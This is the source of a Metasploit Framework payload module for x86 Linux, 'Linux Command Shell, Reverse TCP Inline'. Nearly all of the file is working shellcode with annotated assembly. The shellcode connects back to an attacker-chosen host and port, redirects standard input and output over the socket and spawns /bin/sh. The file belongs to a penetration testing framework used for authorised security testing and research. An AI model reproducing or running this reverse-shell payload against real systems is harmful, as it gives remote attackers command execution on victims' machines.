metasploit-framework/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
      'Author'        => 'Ramon de C Valle',
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_X86,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          'Offsets' =>
            {
              'LHOST'    => [ 25, 'ADDR' ],
              'LPORT'    => [ 32, 'n'    ],
            },
          'Payload' =>
            "\x31\xdb"             +#   xor ebx,ebx
            "\xf7\xe3"             +#   mul ebx
            "\x53"                 +#   push ebx
            "\x43"                 +#   inc ebx
            "\x53"                 +#   push ebx
            "\x6a\x02"             +#   push byte +0x2
            "\x89\xe1"             +#   mov ecx,esp
            "\xb0\x66"             +#   mov al,0x66
            "\xcd\x80"             +#   int 0x80
            "\x93"                 +#   xchg eax,ebx
            "\x59"                 +#   pop ecx
            "\xb0\x3f"             +#   mov al,0x3f
            "\xcd\x80"             +#   int 0x80
            "\x49"                 +#   dec ecx
            "\x79\xf9"             +#   jns 0x11
            "\x68\x7f\x00\x00\x01" +#   push dword 0x100007f
            "\x68\x02\x00\xbf\xbf" +#   push dword 0xbfbf0002
            "\x89\xe1"             +#   mov ecx,esp
            "\xb0\x66"             +#   mov al,0x66
            "\x50"                 +#   push eax
            "\x51"                 +#   push ecx
            "\x53"                 +#   push ebx
            "\xb3\x03"             +#   mov bl,0x3
            "\x89\xe1"             +#   mov ecx,esp
            "\xcd\x80"             +#   int 0x80
            "\x52"                 +#   push edx
            "\x68\x2f\x2f\x73\x68" +#   push dword 0x68732f2f
            "\x68\x2f\x62\x69\x6e" +#   push dword 0x6e69622f
            "\x89\xe3"             +#   mov ebx,esp
            "\x52"                 +#   push edx
            "\x53"                 +#   push ebx
            "\x89\xe1"             +#   mov ecx,esp
            "\xb0\x0b"             +#   mov al,0xb
            "\xcd\x80"              #   int 0x80
        }
      ))
  end

end